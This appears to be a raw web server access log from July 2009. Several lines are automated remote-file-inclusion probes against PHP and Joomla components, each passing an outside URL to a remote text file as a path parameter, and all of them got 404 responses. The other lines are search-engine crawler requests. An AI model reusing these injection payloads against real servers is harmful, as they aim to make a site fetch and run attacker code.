146.48.83.133 - - [26/Jul/2009:07:58:27 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:07:58:27 -0400] "GET //common/db.php?commonpath=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:07:58:27 -0400] "GET /logs//common/db.php?commonpath=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:07:58:27 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
66.249.68.247 - - [26/Jul/2009:07:58:39 -0400] "GET /images/_notes/nav_store_search_over.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.125.45.45 - - [26/Jul/2009:07:59:40 -0400] "GET /logs/access_log.Q109062300/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.20.186.139 - - [26/Jul/2009:07:59:49 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:07:59:27 -0400] "GET /logs/access_log.Q109052200 HTTP/1.0" 200 4757864 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [26/Jul/2009:08:00:31 -0400] "GET /logs/access_log.Q109031300 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.125.45.45 - - [26/Jul/2009:08:00:36 -0400] "GET /logs/error_log.Q109061800%20/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
